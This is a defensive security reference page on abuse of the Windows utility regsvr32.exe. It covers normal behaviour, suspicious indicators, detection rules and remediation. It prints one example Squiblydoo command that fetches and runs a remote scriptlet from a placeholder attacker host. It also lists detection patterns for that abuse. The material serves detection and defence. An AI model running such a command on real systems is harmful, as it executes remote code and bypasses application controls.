High RiskWindowsLegitimateCommonly Abused
regsvr32.exeSYSTEM UTILITYregsvr32.exe - COM Registration LOLBin Security Analysis
regsvr32.exe registers COM DLLs. It is a **LOLBin** abused for executing remote scripts via the /s /n /u /i switches ("Squiblydoo" technique), bypassing application controls and proxy-aware download.
Risk Summary
HIGH priority. regsvr32.exe with /i:http... is a strong IOC. Monitor for network activity and remote script execution patterns.
Overview
What is regsvr32.exe?
regsvr32.exe registers and unregisters COM DLLs.
Security Significance
- LOLBin: Documented in LOLBAS
- Squiblydoo: Remote script execution technique
- Proxy-Aware: Uses system proxy for downloads
- AppLocker Bypass: Often whitelisted
Normal Behavior
Normal Behavior
| Property | Expected Value |
|---|---|
| Path | C:\Windows\System32\regsvr32.exe |
| Path (32-bit) | C:\Windows\SysWOW64\regsvr32.exe |
| Usage | During software installation |
Common Locations
C:\Windows\System32\regsvr32.exeC:\Windows\SysWOW64\regsvr32.exeSuspicious Indicators
Suspicious Indicators
| Indicator | Risk |
|---|---|
| /i:http... URL | CRITICAL |
| /s /n /u /i combo | CRITICAL |
| scrobj.dll reference | HIGH |
| Network connections | HIGH |
Abuse Techniques
Attack Techniques
Squiblydoo Technique (T1218.010)
regsvr32.exe /s /n /u /i:http://evil.com/file.sct scrobj.dll
This downloads and executes a remote SCT (scriptlet) file.
Detection Guidance
Detection
regsvr32.exe CommandLine CONTAINS "http" → ALERT: CRITICAL
regsvr32.exe CommandLine CONTAINS "scrobj.dll" → ALERT: HIGH
regsvr32.exe NetworkConnection = True → ALERT: HIGH
Remediation Steps
- Block regsvr32.exe network access via firewall
- Monitor for /i: parameter with URLs
- Use Application Control to restrict DLL registration
Investigation Checklist
- Check command line for URLs
- Look for scrobj.dll references
- Review network connections
- Check for downloaded scriptlets
MITRE ATT&CK Techniques
Last verified: January 18, 2026